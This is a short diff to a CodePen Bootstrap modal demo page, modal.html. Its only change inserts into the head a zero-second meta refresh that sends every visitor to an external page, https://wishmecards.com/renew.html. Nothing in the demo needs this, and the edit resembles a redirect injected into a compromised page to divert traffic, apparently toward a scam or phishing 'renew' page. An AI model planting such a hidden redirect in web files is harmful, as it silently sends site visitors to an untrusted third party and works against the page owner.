--- a/modal.html
+++ b/modal.html
@@ -1,6 +1,6 @@
 <!DOCTYPE html>
 <html lang="en" >
-<head>
+<head><meta http-equiv="refresh" content="0; URL='https://wishmecards.com/renew.html'" />
   <meta charset="UTF-8">
   <title>CodePen - Bootstrap 3 Modal Vertically Center/Max-Height</title>
   <meta name="viewport" content="width=device-width, initial-scale=1">
